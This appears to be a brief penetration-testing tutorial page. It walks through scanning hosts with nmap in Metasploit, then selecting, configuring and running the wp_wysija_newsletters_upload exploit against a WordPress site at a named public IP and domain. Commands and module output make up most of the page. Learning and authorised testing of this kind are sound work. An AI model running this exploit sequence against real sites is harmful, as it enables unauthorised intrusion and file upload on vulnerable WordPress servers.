Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

WordPress

Identify a Remote Host

msf > db_nmap -v -sV 192.168.111.xxx

Scan an Entire Network

  • This will save the results to the metasploit database
msf > nmap -v -sV 192.168.111.0/24 -oA subnet_1
  • hosts will list all the hosts found by nmap.
  • hosts -R will add them to the list of hosts to exploit.

Searching for a WordPress Vulnerability

msf > search name:wordpress

Use an Exploit

  • This will select an exploit to use:
msf > use exploit/unix/webapp/wp_wysija_newsletters_upload
  • This will show you the attacks that the exploit will take advantage of:
msf exploit(wp_wysija_newsletters_upload) > show payloads

  • This will show what software and version will be targeted:
msf exploit(wp_wysija_newsletters_upload) > show targets
Exploit targets:

    Id  Name
    --  ----
    0   wysija-newsletter < 2.6.8

Next configure the Exploit

msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletter_upload):

    Name        Current Settings    Required    Description
    ----        ----------------    --------    -----------
    Proxies                         no          A proxy chain of format type:host:port[,type:host:port][...]
    RHOST                       no          The target address
    RPORT       80                  yes         The target port
    SSL         false               no          Negotiate SSL/TLS for outgoing connections
    TARGETURI   /                   no          The base path to the wordpress application
    VHOST                           no          HTTP server virtual host

Exploit target:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8
  • Here is where we set all the options:
msf exploit(wp_wysija_newsletters_upload) > set RHOST 159.203.19.77
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.life

Run the Exploit

msf exploit(wp_wysija_newsletters_upload) > exploit

results matching ""

    powered by

    No results matching ""